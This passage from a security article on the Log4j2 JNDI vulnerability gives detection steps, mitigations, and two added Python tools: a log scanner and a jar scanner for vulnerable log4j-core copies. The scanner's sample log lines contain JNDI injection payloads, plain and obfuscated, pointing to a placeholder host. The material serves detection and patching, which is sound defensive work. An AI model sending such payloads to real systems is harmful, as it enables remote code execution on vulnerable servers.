  1. Check whether the logs, or the fully decoded request packets, contain the keyword ${jndi:.
  2. Check whether the logs contain related stack traces, and whether the stacks include JNDI-call-related frames such as JndiLookup, ldapURLContext and getObjectFactoryFromReference.
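
The two checks above can be run over logs as in the following added example (not part of the original article or of any tool it mentions). It URL-decodes each line up to twice and folds the nested lookup forms shown in section 0x04 (lower, upper and the :- default) before searching for ${jndi:, then falls back to the error keywords and stack-frame names listed here. The log lines are constructed samples, example.invalid is a placeholder host, and folding only those three forms is an assumption of this sketch.

```python
import re
from urllib.parse import unquote

# Error strings and stack-frame names listed in the two checks above.
ERROR_MARKERS = (
    "javax.naming.CommunicationException",
    "javax.naming.NamingException: problem generating object using object factory",
    "Error looking up JNDI resource",
    "JndiLookup", "ldapURLContext", "getObjectFactoryFromReference",
)
INNER = re.compile(r"\$\{([^${}]*)\}")   # an innermost ${...} with nothing nested in it
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)

def _fold(m):
    """Resolve the lookup forms the obfuscated strings in section 0x04 are built from."""
    body = m.group(1)
    head = body[:6].lower()
    if head == "lower:":
        return body[6:].lower()
    if head == "upper:":
        return body[6:].upper()
    if ":-" in body:                     # ${name:-default}: an unresolved name yields the default
        return body.split(":-", 1)[1]
    return m.group(0)                    # any other lookup is left untouched

def has_jndi_lookup(text, max_rounds=8):
    """True if text contains ${jndi: directly, or after URL-decoding and folding."""
    for _ in range(2):                   # request data may be URL-encoded twice
        text = unquote(text)
    for _ in range(max_rounds):
        if JNDI.search(text):
            return True
        folded = INNER.sub(_fold, text)
        if folded == text:               # nothing left to fold
            return False
        text = folded
    return bool(JNDI.search(text))

def triage(line):
    """Classify one log line as 'lookup', 'jndi-error' or None."""
    if has_jndi_lookup(line):
        return "lookup"
    if any(marker in line for marker in ERROR_MARKERS):
        return "jndi-error"
    return None

def scan(lines):
    """Return (line number, verdict) for every line that needs a closer look."""
    return [(n, triage(l)) for n, l in enumerate(lines, 1) if triage(l)]

# Constructed sample lines, not taken from a real system.
SAMPLE_LOG = [
    '10.0.0.5 "POST /hello" payload=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%7D',
    '10.0.0.5 "GET /" ua="${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://example.invalid/poc}"',
    '10.0.0.5 "GET /" ua="${${lower:${lower:jndi}}:${lower:rmi}://example.invalid/poc}"',
    'ERROR Error looking up JNDI resource [ldap://example.invalid/a]',
    '\tat org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java)',
    '10.0.0.7 "GET /index.html" ua="Mozilla/5.0" price=${amount}',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

A "lookup" verdict means the request carried a lookup string; a "jndi-error" verdict means the application actually attempted a JNDI call, which deserves higher priority.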

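0x07 Vulnerability Remediation

  • Check whether the application includes the Apache Log4j2 jar; if the dependency is present, the application may be affected. Upgrade all applications that use Apache Log4j2 to the latest version as soon as possible: https://github.com/apache/logging-log4j2
  • Mitigations:
    • Add the JVM startup parameter -Dlog4j2.formatMsgNoLookups=true
    • Add a log4j2.component.properties configuration file to the application's classpath, with the content: log4j2.formatMsgNoLookups=True
    • Remove the JndiLookup class file from the log4j-core package and restart the service
  • Collection of vendors' emergency response plans for the log4j2 vulnerability: https://mp.weixin.qq.com/s/ZbzLc_N26lgUfvS-mM4R2g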
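
The first bullet (finding log4j-core copies) and the JndiLookup removal can both be verified with a scan like the following added example, which is not code from the original article or from the Log4j project. It opens an archive, follows nested jar/war/ear files such as those inside a Spring Boot fat jar, reads the version from the Maven pom.properties entry and reports whether JndiLookup.class is still present; it assumes the jar keeps its Maven metadata and has not been shaded or relocated, and the jars it inspects are constructed in memory as samples.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def in_affected_range(version):
    """Affected range as stated in this article: 2.0 through 2.14.1 (qualifiers ignored)."""
    nums = re.findall(r"\d+", version.split("-", 1)[0])
    v = tuple(int(n) for n in nums)
    return bool(v) and (2, 0) <= v <= (2, 14, 1)

def inspect_archive(data, name="<archive>", depth=0, max_depth=4):
    """Return one finding per log4j-core copy in the archive, following nested archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = None
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = m.group(1).strip() if m else None
            findings.append({
                "path": name,
                "version": version,
                "jndi_lookup_present": JNDI_CLASS in names,
                "affected_version": in_affected_range(version) if version else None,
            })
        if depth < max_depth:
            for inner in sorted(names):
                if inner.lower().endswith((".jar", ".war", ".ear")):
                    findings += inspect_archive(zf.read(inner), f"{name}!/{inner}", depth + 1, max_depth)
    return findings

def _make_jar(entries):
    """Build an in-memory jar from {entry name: bytes}; used only for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry, content in entries.items():
            zf.writestr(entry, content)
    return buf.getvalue()

def build_samples():
    """Constructed samples: a fat jar bundling log4j-core 2.14.1, and a copy with JndiLookup removed."""
    core = _make_jar({POM_PROPS: b"version=2.14.1\n", JNDI_CLASS: b"stub"})
    stripped = _make_jar({POM_PROPS: b"version=2.14.1\n"})
    fat = _make_jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": core,
                     "BOOT-INF/lib/other.jar": _make_jar({"a.txt": b"x"})})
    return {"app.jar": fat, "patched/log4j-core.jar": stripped}

if __name__ == "__main__":
    for name, data in build_samples().items():
        for finding in inspect_archive(data, name):
            print(finding)
```

A copy that reports an affected version with jndi_lookup_present set to False has had the class-removal mitigation applied but still needs the upgrade.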
